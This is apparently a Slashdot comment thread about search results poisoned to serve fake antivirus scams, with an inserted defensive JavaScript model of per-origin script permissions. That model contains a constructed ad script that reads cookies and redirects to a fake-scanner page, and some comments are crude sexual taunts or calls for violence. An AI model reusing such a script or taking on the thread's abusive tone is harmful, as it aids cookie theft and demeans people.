      The first thing anyone who gives a damn about IT security learns is "don't open any old random garbage". How important this rule is (and how easily it's forgotten) was first brought home with things like ILOVEYOU - and that was 11 years ago, FFS. As a result, mail systems have been getting ever more paranoid about accepting executables - it's quite awkward to even successfully receive an executable in Outlook today, and that's assuming they've not been blocked at the mail server.

      While this has been going on, web browsers and their plugins have been merrily gaining more and more functionality and more and more potential for exploits of more-or-less exactly the same type. But they're slightly worse. With email, most modern mail applications don't run any active content that's likely to cause a problem until you explicitly tell them to. Web browsers run it as soon as the page loads.

      So we now have millions of people worldwide who are actively using a tool which - by design - downloads and runs random code from anywhere in the world with little or no confirming that one would want to - or indeed that it would be sensible to. At best you have something like Safari's "Warning, this site may damage your computer" page - but we already know that such warnings are fairly useless because people have been conditioned to ignore them.

    57. Re:web 101: don't run unknown javascripts by fuzzix · · Score: 1

      I prefer to, oh you know, not run an operating system that is susceptible to malware attacks.

      HAHAHAHA!

      Oh, you were being serious.

    58. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      Then you really need to come out of the 90's. JS can direct you to a malicious site. The malicious site can use JS to display a fake virus warning and this tricks the user into downloading fake AV programs.

    59. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      ***By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them.***

      Well yes. The problem is that a high percentage of web site designers seem not to be very good at their job. Even if their site consists entirely of text content and would be useful, reliable, safe, attractive, and likely to render correctly for all users if they used html and fed it through the W3C validator, they use javascript. Let's take the first four lines of a web page from www.slashdot.org.

      Yes, it's the first four lines of THIS webpage.

    60. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      Well, that's cute. Let's try it substituting square brackets for angle brackets

      [!DOCTYPE html]
      [html lang="en"]
      [head]
      [script id="before-content" type="text/javascript"]

    61. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      Did you try it while logged in to a Google account? I'm guessing you didn't and the original person reporting the issue probably was logged in. If you are logged in Google does a lot more script and their links do tracking stuff and are often a bunch of redirects.

    62. Re:web 101: don't run unknown javascripts by GIL_Dude · · Score: 1

      The issue isn't always really that JS lets the baddies do anything to your machine directly. It is usually more that it allows them to do a redirect to a site that is serving an exploit kit with lots of nice exploits against browser objects that are usually auto-instantiating (for folks who aren't running a blocker or the like). Examples of common auto-instantiating objects would be Flash and Acrobat Reader. These can be exploited without anything visible showing to the user. Often, vulnerabilities in these programs are used to do nefarious things like install fake AV programs that render your machine mostly useless unless you pay. (They tend to intercept process start events and stop the programs from starting and display "infected" messages).

      So, since the browser normally trusts and runs any JS referenced by the site - no matter what other site it comes from or redirects to, it is a problem.

    63. Re:web 101: don't run unknown javascripts by Teckla · · Score: 1

      The fact is, the average non-techie user values "interactive" over "secure".

      That's nonsense.

      Average non-technical users value "secure" at least as much as they value "interactive". But they are not domain experts, much like average car drivers are not master mechanics.

      They simply don't know what to look for, what to worry about, how to interpret so much geek-ese in their software. The true failing is with us software developers. We create confusing, overly technical and complex crap, and expect people should have to spend 90% of their waking lives understanding it in order to use it safely.

      We should be delivering them safe-by-default products that Just Work, and when something out of the ordinary happens, we should make it easy for them to understand and make an informed choice. No, making them Google what's going on is not acceptable.

    64. Re:web 101: don't run unknown javascripts by Angostura · · Score: 2

      You're the kind of stupid that makes a website that's just one big flash object with no links to non-flash content.

      And you're the kind of person who defines everything in the universe as 'black' or 'white'

    65. Re:web 101: don't run unknown javascripts by Gumbercules!! · · Score: 1

      Anyone up for the irony of complaining about AJAX scripting on Slashdot? Try viewing *this very site* with NoScript enabled and see how much fun it is...

    66. Re:web 101: don't run unknown javascripts by Tim+C · · Score: 2

      Actually in a lot of cases the partial page loads are there more to help the server than the client; a heavily-hit site can reduce bandwidth usage and processing overhead by a substantial amount by only processing/transferring the relevant portions of a page. The fact that it also may improve the end user experience is a nice bonus rather than the primary consideration.

    67. Re:web 101: don't run unknown javascripts by Caetel · · Score: 1

      Presumably the difference is that everybody uses PDFs and Javascript, but nobody uses [FOSS codec of choice], so there is greater value to the average user in including the former two rather than the latter.

    68. Re:web 101: don't run unknown javascripts by MstrFool · · Score: 1

      Wow... I hadn't expected to see that referenced and adapted here. You, Sir or Madam, deserve a cookie for that. Hmm, though considering the topic, maybe a brownie...

      --
      Question reality.
    69. Re:web 101: don't run unknown javascripts by Paradise+Pete · · Score: 1

      Wow... I hadn't expected to see that referenced and adapted here.

      Maybe it just means we're old. :-)

    70. Re:web 101: don't run unknown javascripts by Tacvek · · Score: 1

      My point exactly. I clicked the reply button, and it did not go to a new page. I can still scroll up or down to refer to other messages, even expanding the hidden ones, all without losing what I am currently typing, and without needing to use a second tab to compose the reply. While I detest some of the nasty bugs that were present when D2 and D3 were introduced, I still remember using D1, and this is still much better than that experience.

      --
      Stylish sheet to fix many problems in Slashdot's D3: https://gist.github.com/801524
    71. Re:web 101: don't run unknown javascripts by Tacvek · · Score: 1

      When AJAX is implemented properly, the back/forward buttons can still work, and you can open links in new tabs just like normal. Even bookmarking still works properly. I'll admit that many sites do things wrong. I would not object to blacklisting JavaScript on such a site if they were written to still work without JavaScript enabled. But there are sites that get it right.

      For example Gmail gets it more or less right. The back and forward buttons do the right thing, and you can right click on the links and open them in a new tab. The only thing I would complain about is that messages listed in the list are not actually links. You can open them in a new foreground tab by holding control when you click them, but there currently is no way to open them in a background tab.

      However, in exchange for that it takes noticeably less time to open a message vs the basic html version of Gmail. You get new capabilities that are not possible with AJAX, such as having the inbox update automatically, without having a meta-refresh tag which would be irritating when scrolling through the list of messages, or being able to drag a message to a label to remove the inbox label, and add the one I dragged them to.

      --
      Stylish sheet to fix many problems in Slashdot's D3: https://gist.github.com/801524
    72. Re:web 101: don't run unknown javascripts by lennier · · Score: 1

      Because browsers allow 3rd party Javascript to run as if it were 1st party.

      But why does even "1st party" Javascript have the ability to cause a program to be run or installed on your computer? My computer isn't a DOM document.

      --
      You are not a brain: http://books.google.com/books?id=2oV61CeDx-YC
    73. Re:web 101: don't run unknown javascripts by Waccoon · · Score: 1

      Well, that's more of a problem with the browser's security policies.

      No script should be able to call events that go outside of its containing context (if you want to open or close a "window", it had better be affecting a frame within the current window, thank you). Creating calls like "window.open" and attaching them to JavaScript was a really stupid idea from the start. That's the fault of the web browser developers. If done right, JavaScript, DOM, and whatever browsers want to use wouldn't be a big deal.

      The real problem is that JavaScript basically runs in one giant address space, so any JavaScript imported from 3rd party web sites has the same level of access as 1st party JavaScript. This is incredibly stupid. A lot of web sites outsource to ad agencies, or use more than one ad agency, so keeping track of good/bad agencies is a major challenge. Not like you can trust advertisers who have the chance to leech your data to improve their service, either. Once their code is included in your web page, they can do pretty much anything with your customer's data, cookies, keystrokes, etc. It's a security nightmare. Advertising is all about collecting and serving information. What could possibly go wrong?

      DeviantArt has been hit with a rash of ad-delivered mal-ware, particularly through PDF exploits. The site has officially stated that their ad agencies are responsible, they "try" to get good ad agencies, but at the end of the day, you need anti-virus software on YOUR computer and there's not much DA can do about it. That's BS. The ads have been serving mal-ware for years, so whatever action they're taking to get good ad services and dump bad ones obviously isn't working. If they don't take mal-ware seriously, what will they do if the ads start leeching my notes and my passwords?

      Technically, JavaScript only needs better scope to help control the 1st party vs 3rd party problem. The rest is up to browser security policies, which are equally horrid, and none of the browser vendors seem to care. JavaScript and DOM were implemented in a hurry to offer stupid tricks and dynamic content. Security was never considered, and today is outright ignored on purpose.

    74. Re:web 101: don't run unknown javascripts by Mana+Mana · · Score: 1

      > Turn Javashit on, and clicking the tab works just fine

      Dunno about any of that---although I requested Giorgio over 18 months ago to provide an allow google script locally to their properties, NOT on the entire Net, he mentioned some shiz, but I don't know WTF he was talking about, Google scripts still fire around the whole fucking web for me, AND requestpolicy? is so fucking ham-handed for me that I have it but never used it again since the initial install over a year ago---but they motherfucking lost me on Google News.

      I used to have it as my browser start page, and I used it constantly, not anymore. Not since they required cookies to REMEMBER modifications to revert to the old double column format. I like my shit sorted fuckers! Not a runon fucking pile of headlines. Anyway all these complaints are wasted, I'm sure they read them, but don't shit about them. My anger and profanity are proportional to my love lost and betrayal. =) And if you're drinking at home ... fuckers!

    75. Re:web 101: don't run unknown javascripts by mmj638 · · Score: 1

      It's 2011. Javascript is not optional for the web anymore.

      Javascript is also not the problem. It's insecure server-side code that's the problem. XSS is not a Javascript vulnerability, it's a vulnerability with the server side. Javascript is just an actor, not the protagonist. Untrusted Javascript is let onto a server only if the server or its server-side application code is insecure.

    76. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      You're on drugs, right? Drunk? Or just stupid?

    77. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      for one, not running explorer 6 as administrator is a good start.
      then you can survive drive by attacks even without having to manually turn on and off javascript for every page you're visiting.

      chrome + seven + no privileges is pretty safe and even my granddad can use that. do you know how many help calls would I receive if I try to go noscript on parents and friends?

      but, if you're instead worried about tracking, then that is tin foil hat area and there is nothing better than noscript for presumption of privacy.

      try this with noflash and noscript and see how much anonymous you are:
      http://panopticlick.eff.org

    78. Re:web 101: don't run unknown javascripts by AnnaZed · · Score: 1

      I am going to have to second that. After reading this post I installed the NoScript add-on yesterday even though I haven't actually had any problems. I have seen potentially toxic links in Google image searches (and in regular searches as well) but they are pretty easy to identify so I just didn't follow them from the search page. Anyway, 24 hours of NoScript was enough of that (thank you very much). I have to do internet searches for work and monkeying around with that thing would (literally) make the task take up to three times longer. With NoScript what you get is what someone upthread called "an ugly broken thing." I don't have the time or the patience to click through the many options that NoScript offers for each and every page. While it is interesting how much crazy script there is out there in the world attempting to control each and every incidence of it by hand is absurd. Incidentally, I found the uninstall instructions on the NoScript help page http://noscript.net/faq#qa2_3 where they basically call you an idiot for uninstalling their obnoxious, time consuming and esthetically unappealing add-on to be a bit insulting; not to mention that the NoScript home page itself is studded with script and looks like something from 1991. NoThanks

    79. Re:web 101: don't run unknown javascripts by Uzuri · · Score: 1

      This was true earlier this month, but they appear to have fixed it.

      Now the fact that google maps now requires cookies to work pisses me off...

      --
      I'm a she-slashdotter... but I make up for it by living with my folks.
  3. So... by Mashiki · · Score: 2

    Can we scrap the entire js system now and rebuild it from scratch so it stays inside a fucking sandbox this time?

    --
    Om, nomnomnom...
    1. Re:So... by larry+bagina · · Score: 1

      This "attack" uses javascript to redirect. If javascript can redirect, a sandbox won't help. If javascript can't redirect, a sandbox isn't necessary.

      --
      Do you even lift?

      These aren't the 'roids you're looking for.

    2. Re:So... by ChunderDownunder · · Score: 2

      Ummm... Isn't specifying what actions a script can perform the definition of a sandbox?

      accessing the filesystem, launching popup windows, transmitting content outside of the original domain, redirection, cookies, etc.

      These are all permissions that should be codified by the scripting engine's security manager and configurable by the end-user on a site-by-site option.
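
The per-site permission idea in the comment above, together with the 1st-party/3rd-party problem raised earlier in the thread, modelled as an added example (not code from any commenter, browser or add-on). The origins, capability names and scripts are constructed, and `new Function` only stands in for script loading; it is not a sandbox.

```javascript
'use strict';

// Origin of the page the user actually navigated to (constructed).
const PAGE_ORIGIN = 'https://news.example';

// Constructed per-site policy: capabilities granted to scripts by origin.
// An origin with an empty list may run but cannot touch the page.
const POLICY = {
  'https://news.example': ['cookies', 'redirect', 'popup'],
  'https://ads.example': [],
};

// Fresh model of the page state that scripts compete over.
function newPage() {
  return {
    location: PAGE_ORIGIN + '/story',
    cookie: 'session=constructed-value',
    popups: [],
  };
}

// Build the only object a script receives. Each call is checked against the
// policy of the origin the script runs as, and logged whether it was allowed.
function makeHost(scriptOrigin, runsAs, page, log) {
  const granted = new Set(POLICY[runsAs] || []); // unknown origin: nothing
  const guard = (cap, action) => (...args) => {
    const allowed = granted.has(cap);
    log.push({ script: scriptOrigin, runsAs, cap, allowed });
    return allowed ? action(...args) : undefined;
  };
  return Object.freeze({
    readCookies: guard('cookies', () => page.cookie),
    redirect: guard('redirect', (url) => { page.location = String(url); }),
    openPopup: guard('popup', (url) => { page.popups.push(String(url)); }),
  });
}

// Constructed scripts: the site's own code, and an ad script that reads
// cookies and sends the user to a fake-scanner page.
const SCRIPTS = [
  { origin: 'https://news.example', code: 'host.readCookies();' },
  {
    origin: 'https://ads.example',
    code: 'host.readCookies(); host.redirect("https://fake-scan.example/");',
  },
];

// perOrigin = false: every included script runs as the page's origin
//                    (3rd-party code treated as 1st-party).
// perOrigin = true:  each script is held to its own origin's policy.
function run(scripts, perOrigin) {
  const page = newPage();
  const log = [];
  for (const s of scripts) {
    const runsAs = perOrigin ? s.origin : PAGE_ORIGIN;
    const host = makeHost(s.origin, runsAs, page, log);
    try {
      // `page` is local to run(), so the script can reach it only via host.
      new Function('host', s.code)(host);
    } catch (err) {
      log.push({ script: s.origin, runsAs, cap: 'error', allowed: false });
    }
  }
  return { page, log, denied: log.filter((e) => !e.allowed) };
}

const shared = run(SCRIPTS, false);
const scoped = run(SCRIPTS, true);
console.log('shared scope  ->', shared.page.location, 'denied:', shared.denied.length);
console.log('per-origin    ->', scoped.page.location, 'denied:', scoped.denied.length);
```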

    3. Re:So... by larry+bagina · · Score: 2

      I can ask javascript to suck my cock all night long, but it doesn't. Even in browsers without a sandbox.

      --
      Do you even lift?

      These aren't the 'roids you're looking for.

    4. Re:So... by Anonymous Coward · · Score: 0

      Reminds you of this?

      Neo: What are you trying to tell me? That I can dodge bullets?
      Morpheus: No, Neo. I'm trying to tell you that when you're ready, you won't have to. ..

      HTML5 is that js system, or Web 3.0 which you covet. Soon, we will have to worry about disabling it too... but currently there is NO way in any browser to deny the rogue developers the devastating browser-side power that only plugins used to be able to have back 15 years ago.

    5. Re:So... by Billly+Gates · · Score: 1

      The difference is marketers use SEO to trick Google to give them high rankings. Malware writers use it too so an unrelated picture to your search can manipulate Google into displaying the page.

    6. Re:So... by Anonymous Coward · · Score: 0

      Can we scrap the entire js system now and rebuild it from scratch so it stays inside a fucking sandbox this time?

      You mean how java virtual machine is meant to be?

    7. Re:So... by Anonymous Coward · · Score: 0

      Not sure why we don't sandbox the entire browser process. Have the browser think it has a file system using a dummy filesystem, and that's that. If you need to save a web page, save it to the dummy filesystem, then copy from there to the main one if need be.

  4. Use an alternative search. by Deathlizard · · Score: 3, Insightful

    At this point, I feel SEO poisoning is so bad on Google that I find myself using other search engines more since they don't seem to be as big of a target.

    Altavista, Ask and Bing have just been giving me more relevant search results lately. Google seems to like to show more SEO sites, forum reposters that just repost the same forum entries over and over and "Meta Search" sites such as software informer and alibaba.

    Image search Rogueware poisoning is yet another reason to start looking somewhere else for search results.

    1. Re:Use an alternative search. by Pseudonym+Authority · · Score: 3, Interesting

      Altavista, Ask and Bing have just been giving me more relevant search results lately.

      Somewhat interestingly, and wildly offtopic, Altavista is powered by Yahoo, and Yahoo is powered by Bing, so you are really only using at most 2 search engines. (Ask also outsources to someone, but they don't say who, so it may very well be M!r0$0f+ as well).

    2. Re:Use an alternative search. by VortexCortex · · Score: 1

      Image search Rogueware poisoning is yet another reason to start looking somewhere else for search results.

      CORRECT. The more people stop using Google, the better their search will get -- They surely prioritize things; if everyone is displeased but keeps using their product out of habit then it's not as big of a priority. If they start losing lots of visitors over it then it will get fixed.

    3. Re:Use an alternative search. by Anonymous Coward · · Score: 0

      You can easily block any site from appearing in your Google search results.

    4. Re:Use an alternative search. by Undead+Waffle · · Score: 4, Funny

      Altavista, Ask and Bing have just been giving me more relevant search results lately.

      Somewhat interestingly, and wildly offtopic, Altavista is powered by Yahoo, and Yahoo is powered by Bing, so you are really only using at most 2 search engines. (Ask also outsources to someone, but they don't say who, so it may very well be M!r0$0f+ as well).

      And Microsoft copies Google's search results so in the end everyone is just using Google!

  5. screenshots by cobbaut · · Score: 5, Informative

    Two weeks ago I put some screenshots of what it looks like on my blog:
    http://cobbaut.blogspot.com/

    --
    European Linux user, living in Antwerp
    1. Re:screenshots by Anonymous Coward · · Score: 0

      I tried the link. An image displays as expected and... nothing else.

      NoScript is the best plugin ever!!!

    2. Re:screenshots by Anonymous Coward · · Score: 1

      Two weeks ago I put some screenshots of what it looks like on my blog:
      http://cobbaut.blogspot.com/

      Cool, I was worried my OS was bought out by Microsoft and they gave me a C: drive

    3. Re:screenshots by MBCook · · Score: 1

      I saw that particular trick when someone at my office ran into it about a year and a half ago. I realized what it was (they thought it was real) so I decided to try an experiment...

      I pulled up the address on my iPhone and got the same thing. It looks really neat to see an iPhone show Windows Explorer and run a fake virus scan.

      I was very impressed though. It's a quite convincing simulation, much better than the old generic "Your computer has a virus" image pop-ups with flashing text.

      --
      Comment forecast: Bits of genius surrounded by a sea of mediocrity.
    4. Re:screenshots by bmo · · Score: 3, Interesting

      I've seen it. It detects Chrome and puts up a fake Chrome screen.

      The problem is that the dialog is modal and steals focus from Chrome. You can't simply close the tab. So you click, it does its "scan" and gives a heads-I-win-tails-you-lose dialog and you click that and you wind up downloading a windows executable, and that's when Chrome finally steps in and says "hey, this is an executable file, do you really want this?" and that's the only place you can say no-thanks.

      The only other solution is to force-kill (kill -9) the entire Chrome window at the start.

      Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

      I did this in Linux, but having wine installed means that this could be a vector for malware in Linux, too, with a little more work.

      inb4 "but no malware writer cares about linux" and "hurr, wineserver is a user process, so it makes no sense to have autorun malware as a user" (as if anyone ever checks his .bashrc or .profile). The only thing I see as a barrier to this foolishness is the relative intelligence of your average Linux guy (me) versus the typical Windows user in deciding not to run something thrust at the browser for download from a bad website.

      --
      BMO

    5. Re:screenshots by Anonymous Coward · · Score: 0

      Damn, I tried the badware link on my jailbroken iPhone and it actually downloaded a file and tried installing a debian package...on my PHONE.

      What the fuck man.

    6. Re:screenshots by Barbarian · · Score: 1

      Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

      Chrome? Can't you use the Shift-Esc built in Chrome task manager and kill the window?

    7. Re:screenshots by bmo · · Score: 1

      What ordinary user knows about the Chrome task manager?

      Remember that I'm trying to look at it from a "joe user" perspective, not an expert's perspective. Granted I said "kill -9" there but that was to illustrate the point that an ordinary user has no way to really back out once the script has started to operate, and that starts as soon as the person navigates to the page.

      --
      BMO.

    8. Re:screenshots by Anonymous Coward · · Score: 0

      I came across the same thing on Firefox, like GP and had to clean the PC. Later, I got tired of even Yahoo being capable of stealing focus from my browser just to say that I signed in from another PC and decided to take action. Googling led to a supposed fix that never worked for me on FF 3. I do not understand why devs refuse to give us control of our open source browsers. A simple control statement in their C++ and one more tickmark in their complex preferences is not going to take a whole decade to implement... oh, wait, it already has.

      I'm tired of losing browser sessions to kill -9 simply because FF and Chrome have no way to single out a tab to a process number for the JS dialog --even more code would be needed, but these are the same browser devs who wasted time with status bar replacements and crazy new GUIs instead of long-ingrained problems.

      We must realize that a lot of people are stuck in the same dilemma of Windows newbs: the current choices suck but there is no alternative that is painless. If the alternatives are attractive, they have intense drawbacks and derision. Ergo, switching to MacOS or Linux is just as painful as staying with the devil they know. I hate all major browsers for different reasons, and FF / Chrome are what I regretfully use. We have already lost.

    9. Re:screenshots by Anonymous Coward · · Score: 0

      I pretty much just go into Windows Task Manager when Firefox pops up one of these popup windows from clicking on an image link and kill the process, instead of clicking on ANYTHING at all.

      What's weird is I'll go into a Linux VM, wget the html page that tried to poison me... and find no JavaScript, no advertisement links, nothing in it. At what point does the poisoning happen? I thought it was a worm spreading to web servers.

      Last time I remember this happening was Google image searching "Bobby Fischer" (the racist dipshit fucktard... er, I mean, chess genius), and it was the very first damn image, too.

    10. Re:screenshots by 1729 · · Score: 2

      Chrome should allow you to close a tab and anything else attached to it, at any time. The current situation is unacceptable from a user's POV.

      Chrome? Can't you use the Shift-Esc built in Chrome task manager and kill the window?

      Actually, I just tried (Chrome on a Mac), and I couldn't kill the window through the Chrome Task Manager. Nothing I tried worked: I either had to force-quit the browser or just click "OK" and let it run through the fake scan and download the .exe. I'm annoyed that Chrome doesn't seem to provide a way to block javascript hijacking (other than disabling javascript entirely or through explicit whitelists/blacklists). I don't EVER want a web page to be able to disable my right-click, back button, history, 'view page source' option, etc., all of which this popup did.

    11. Re:screenshots by perryizgr8 · · Score: 1

      and had your phone been an n900, it might have actually gone on and gotten installed!

      --
      Wealth is the gift that keeps on giving.
    12. Re:screenshots by PhunkySchtuff · · Score: 1

      Not only does that link still work after being reported, but it seems that they've crafted a Mac version of the page as well. Going to that link from Safari on a Mac launched a Finder-like window reporting all these issues with my machine, as well as downloading anti-malware.zip and I'd say it would be enough to fool a non-technical user for sure.

    13. Re:screenshots by jimicus · · Score: 2

      I let it complete downloading, the zip file contains a Mac application called MacProtector and it fires up an installer immediately.

      In other words, it's started. Mac users can't be complacent any more.

    14. Re:screenshots by jimicus · · Score: 2

      Replying to myself, but I pushed the file through VirusTotal (which runs suspect files through a whole host of AV engines). Somewhat depressingly, most of them didn't catch it.

      The results are here if anyone's interested.

    15. Re:screenshots by Anonymous Coward · · Score: 0

      Just checking, does Shift+ESC for Chrome's task manager work when you get one of these?

      I haven't actually come across one of these pages yet, but it would be nice to know ahead of time. :)

    16. Re:screenshots by currently_awake · · Score: 1

      It's a shame you can't get hold of the source code and add that feature, it would solve all your problems! We could even give such software a special name so people will know they have that option- something about being open i expect.

  6. So... by __aaqvdr516 · · Score: 1

    Since they're detecting Google, Bing is safe? Wouldn't Bing pretty much slurp the same data while crawling and display pretty much the same result?

  7. Violence is required by erroneus · · Score: 4, Interesting

    The people who are doing this are criminals. They need to be stopped. It's as simple as that. Follow the money and beat the crap out of them until it stops.

    1. Re:Violence is required by Corse32 · · Score: 1

      Hell yeah, let's just do it man... it sounds straightforward enough... Sounds like in an old western, the malware monetizers are the baddies in black robbing trains, and we can be the posse of marshals tracking them by analysing their leavings. I'm going to call this goodie gang: "Literally *all* of the best hackers /in the world/ (who aren't criminals)" Our motto will be "Cyber bad guys - they need to be stopped"

    2. Re:Violence is required by Anonymous Coward · · Score: 0

      Hail yeh dawg!!!

    3. Re:Violence is required by MrL0G1C · · Score: 1

      Or VISA, Mastercard, Paypal et al. should be held to account for passing on money to these obvious fraudsters, All too quick to cut off Wikileaks weren't they - two-faced bastards.

      --
      Waterfox - a Firefox fork with legacy extension support, security updates and better privacy by default.
    4. Re:Violence is required by Anonymous Coward · · Score: 1

      What is wrong with you people? Do you really think that violence is the solution for every problem? Have you not learned that violence leads to more violence? No wonder the world looks like it does when people think like this.

    5. Re:Violence is required by Anonymous Coward · · Score: 0

      I'm too lazy. Can I install an app which does the following and beating for me?

    6. Re:Violence is required by erroneus · · Score: 1

      What you are seeing is a lack of respect for others. At its core, respect is fear. Without fear of retribution or consequences, there can be no respect. I believe the short of it is that these situations are increasing in complexity and in boldness. But in the end, there is a path for money to move which can be followed. (There are no cash transactions here.) There must be punishment. And in the lack of proper government action, what else is there?

      If I could send "poison money" I would.

    7. Re:Violence is required by dominious · · Score: 1

      The people who are doing this are criminals. They need to be stopped. It's as simple as that. Follow the money and beat the crap out of them until it stops.

      This is Slashdot. Let me just show you what is going to happen if we try that: http://www.youtube.com/watch?v=93w0UgfX8jQ

    8. Re:Violence is required by eriqk · · Score: 1

      What you are seeing is a lack of respect for others. At its core, respect is fear. Without fear of retribution or consequences, there can be no respect. I believe the short of it is that these situations are increasing in complexity and in boldness. But in the end, there is a path for money to move which can be followed. (There are no cash transactions here.) There must be punishment.

      Spoken like a true gangster.

  8. a couple add ons that help by d6 · · Score: 5, Insightful

    I surf with requestpolicy and noscript up. It is utterly amazing the number of websites that can't render a page without firing scripts or loading content from 6, 8, 10 or more different domains.
    If you haven't tried these, do it and be amazed at how many sites load without stylesheets, pictures etc. It's amazing how badly shit is implemented - zero thought about graceful degradation.

    no script
    requestpolicy

    1. Re:a couple add ons that help by Runaway1956 · · Score: 1

      I just run AdBlock Plus. The newer versions include anti-XSS. A guy can load Firefox with too many addons, after all.

      --
      "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
    2. Re:a couple add ons that help by Low+Ranked+Craig · · Score: 3, Insightful

      Not zero thought about degradation and not bad implementation. This isn't the same as developing for IE for example. It's simply that implementing features two ways - one for JS and one for no, takes more than twice as much effort, so it doesn't get done. I've told clients before about the JS issues, but what it comes down to is the client doesn't want to spend twice as much to service the 2% that turn off JS. Period. They get a message that tells them to enable JS to use those functions. It's cost vs. benefit 101.

      --
      I still cannot find the droids I am looking for...
    3. Re:a couple add ons that help by nonregistered · · Score: 2

      Same here: no script & requestpolicy. The amount of tweaking required to surf safely tends to make me visit less than a dozen sites regularly.

    4. Re:a couple add ons that help by d6 · · Score: 1

      I say "zero thought" and "bad implementation" because very few of the pages I see rendering like shit add the what? 3 lines? of html and javascript required for a "no script" notice. I suspect it is less a reasoned choice to throw 2% of your traffic overboard than a lack of knowledge.

    5. Re:a couple add ons that help by hedwards · · Score: 2

      Which is really why companies need to be held accountable for exploits in their code rather than being allowed to require that somebody else pay for their incompetence. It worries me a great deal how many sites don't use https for log ins or insist upon not giving users a way of getting in without Flash.

      I'm sure we'd see serious movement quickly if all of a sudden they were themselves responsible for their actions or inaction as the case may be.

    6. Re:a couple add ons that help by Low+Ranked+Craig · · Score: 1

      If that's what you mean then I tend to agree. I always put noscript tags in place if there is functionality that won't work without JS, and I always test for cookie support and tell the user that cookies are required rather than breaking things, or at least they will know why things aren't working.

      But still, for most companies, anything more than that just isn't worth the effort for the 2%. There are a lot of huge sites that don't even do that, they just break. And I do mean huge...

      --
      I still cannot find the droids I am looking for...
    7. Re:a couple add ons that help by Low+Ranked+Craig · · Score: 1

      I agree. I have a few clients that have not popped for an SSL cert for their site and have people logging in in the clear. I've explained it to them in detail, in writing. I don't get it, but there you go...

      --
      I still cannot find the droids I am looking for...
    8. Re:a couple add ons that help by Anonymous Coward · · Score: 0

      This page looks a lot better with noscript and requestpolicy enabled!

    9. Re:a couple add ons that help by Jon+Stone · · Score: 1

      It is utterly amazing the number of websites that can't render a page without firing scripts or loading content from 6, 8, 10 or more different domains

      You can partially blame Google for that - "Serving resources from two different hostnames increases parallelization of downloads".

    10. Re:a couple add ons that help by Anonymous Coward · · Score: 0

      I used to work in security for a time, and until something actually happened which would necessitate more training or better equipment, we wouldn't get it. Then something would happen for which we weren't trained and they'd spend too much money rectifying the situation. Same goes here, as long as it's a potential cost rather than an actual one, they'll ignore it.

  9. Slashdot Promoting Plagiarism by lee1 · · Score: 2

    The summary contains two links. The first is to an article that plagiarises the second, padding the lifted paragraphs with barely intelligible proto-English. What a disgrace.

  10. Mac is vulnerable too by Teckla · · Score: 5, Informative

    My wife got bitten by this just today.

    She navigated to a web page from a Google search result, and Safari automatically downloaded some malware and executed it.

    I didn't believe my wife's story at first, so I tried it. Sure enough, automatic download and execution on Mac/Safari.

    What the fuck, Apple and Safari?

    The only question that remains is whether I'll be moving her to Firefox or Chrome...

    1. Re:Mac is vulnerable too by larkost · · Score: 3, Informative

      It did not download and execute, it downloaded and opened the installer. Your wife would have had to go clicking through an installer, and provide her admin credentials, in order to have installed/run something.

      While this is bad behavior, and will probably finally convince Apple that .pkg should not be on the list of auto-launched items, this is also not the "sky is falling" situation that your post makes it out to be.

    2. Re:Mac is vulnerable too by slyborg · · Score: 4, Informative

      Turn off "Open Safe files after downloading" in Safari Preferences. (-_-)
      Chrome is definitely faster, but doesn't have NoScript and uses more RAM.

    3. Re:Mac is vulnerable too by Anonymous Coward · · Score: 0

      The same thing happened to me. I told your wife she was cute (a white lie if ever there was one!) and then I fucked her. If you want to try it for yourself, you can watch me next time I fill her pussy with baby batter :-)

    4. Re:Mac is vulnerable too by Anonymous Coward · · Score: 1

      For some time back in the Tiger / early Leopard days, Safari was set to automatically open downloads (the option to disable it is in preferences). Apple realized the huge security issue this was, and changed the default, but depending on how you've updated your Mac since then, Safari may still be set to do that.

      The short version: Macs don't do that anymore (by default) and haven't for a while. =P

      Of course...on a Mac, the malware isn't going to be doing too much without admin privs, so there's that at least. =)

    5. Re:Mac is vulnerable too by jo_ham · · Score: 1

      What was the link? What was the malware?

      I want to test this.

      What happened? I am assuming it downloaded an actual executable Mac application - by default Safari *will not* open these without your express permission, and then the system will also ask you for certain filetypes downloaded from the internet whether you really want to run them - the metadata logs the originating site.

      What *exactly* executed, and what was the result?

      I would be interested to know what malware got past, and what her settings in Safari were.

    6. Re:Mac is vulnerable too by Teckla · · Score: 4, Insightful

      It did not download and execute, it downloaded and opened the installer. Your wife would have had to go clicking through an installer, and provide her admin credentials, in order to have installed/run something.

      Sorry, I'm not a Mac expert. All I know is that it automatically downloaded something, and automatically executed something. I'm not technically knowledgeable enough about OS X to know that, even though we immediately exited the malware installer, that nothing bad could possibly have happened.

      And I'm still not convinced the malware installer didn't do something bad before it popped up its first GUI window. I'm not accusing you of being a liar, but my wife uses her Mac to access our bank accounts and such. I have no choice but to nuke the site from orbit (reinstall OS X). I'd like to trust that because someone on the Internet said I'm safe and not to worry about it, that I can just plain not worry about it, but I just can't take that risk.

      At the end of the day, Apple/Safari's amazingly fucked up defaults burned us good and hard. It'll take me days to fully reload and reconfigure her machine.

      Thanks, Apple...

    7. Re:Mac is vulnerable too by Low+Ranked+Craig · · Score: 0

      Sorry, I don't buy this. Please post the offending link. It might have downloaded and mounted a DMG, but default settings do not allow for auto installation.

      --
      I still cannot find the droids I am looking for...
    8. Re:Mac is vulnerable too by Teckla · · Score: 4, Informative

      What was the link? What was the malware?

      I'm sorry to say I no longer have the link. I can tell you my wife was searching for something to the effect of "fairy wings" or "tinkerbell wings" with my young daughter, and that the link she ultimately clicked on was a .ms address. That might help you hunt down the same link, since this happened less than 8 hours ago.

      What happened? I am assuming it downloaded an actual executable Mac application

      I don't recall the exact thing it downloaded, but I recall it ended with .mpkg and was actually a directory I was able to navigate into using Terminal.

